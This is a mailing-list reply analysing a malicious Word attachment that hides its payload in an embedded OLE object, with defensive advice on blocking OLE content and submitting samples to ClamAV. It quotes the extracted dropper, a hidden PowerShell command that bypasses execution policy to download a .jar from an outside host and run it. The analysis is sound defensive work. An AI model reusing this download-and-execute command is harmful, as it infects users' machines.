1 |
On 7/5/19 4:25 PM, Hasan Ç. wrote: |
2 |
> Sure, i sent you bunch of malicious office attachments. |
3 |
> |
4 |
|
5 |
The only one of these that is a "real" office document is Siparis2.docx, |
6 |
and unfortunately it uses a new(ish) exploit technique. Instead of |
7 |
placing the code in a macro, the code is embedded in some other OLE |
8 |
object, and then the document itself is constructed to trick the user |
9 |
into clicking and running that object: |
10 |
|
11 |
https://www.microsoft.com/security/blog/2016/06/14/wheres-the-macro-malware-author-are-now-using-ole-embedding-to-deliver-malicious-files/ |
12 |
|
13 |
https://securityriskadvisors.com/blog/the-return-of-ole-exploit-delivery-cve-2018-8174/ |
14 |
|
15 |
In your example, if you extract Siparis2.docx, you'll find two |
16 |
interesting files, |
17 |
|
18 |
* '[Content_Types].xml' |
19 |
* 'word/embeddings/oleObject1.bin |
20 |
|
21 |
The first one contains a bunch of XML and indicates that this document |
22 |
comes with an embedded OLE object, |
23 |
|
24 |
<Types |
25 |
xmlns="http://schemas.openxmlformats.org/package/2006/content-types"> |
26 |
<Default Extension="bin" |
27 |
ContentType="application/vnd.openxmlformats-officedocument.oleObject"/> |
28 |
... |
29 |
|
30 |
The oleObject1.bin contains the actual exploit, if you scroll down: |
31 |
|
32 |
|
33 |
--++++++-cmd|'/c powershell -executionpolicy bypass -W Hidden -command |
34 |
"& { (new-object |
35 |
System.Net.WebClient).DownloadFile(\"http://www.qyhhy.ml\" ,\" |
36 |
%tmp%\\6uOyYF.jar\") }" & %tmp%\\6uOyYF.jar'!'C14'63 |
37 |
|
38 |
|
39 |
What all this means, is, |
40 |
|
41 |
1. Microsoft is still fucking stupid. |
42 |
2. You won't be able to block these by blocking macros. |
43 |
|
44 |
For these OLE exploits, I only have two ideas: |
45 |
|
46 |
1. Block all OLE objects. |
47 |
2. Allow OLE objects, and try to catch the bad ones. |
48 |
|
49 |
The first option will probably cause a lot of false positives, but it |
50 |
should at least be doable -- for example, by scanning that XML file, and |
51 |
throwing a fit if anything has the oleObject content type. |
52 |
|
53 |
The second option, as you've already discovered, doesn't work so great. |
54 |
You can put anything into an OLE object, so we're back at square one. |
55 |
Whenever you find a malicious OLE object, you have to submit it to the |
56 |
antivirus companies and wait for them to create a signature. For us, |
57 |
that means SaneSecurity and ClamAV, and ClamAV doesn't usually respond |
58 |
quickly. Nevertheless, you can submit them here: |
59 |
|
60 |
https://www.clamav.net/reports/malware |
61 |
|
62 |
I submitted the oleObject1.bin file above already. |
63 |
|
64 |
As far as your other files (xls and csv) go... I'm not sure what to |
65 |
think about those. It looks like they contain junk, but I'm well aware |
66 |
that Excel will try to open them and probably do something stupid in the |
67 |
process. But without a copy of Excel and a death wish handy, I don't |
68 |
know how to troubleshoot further. (Again, you could always submit them |
69 |
to ClamAV and SaneSecurity.) |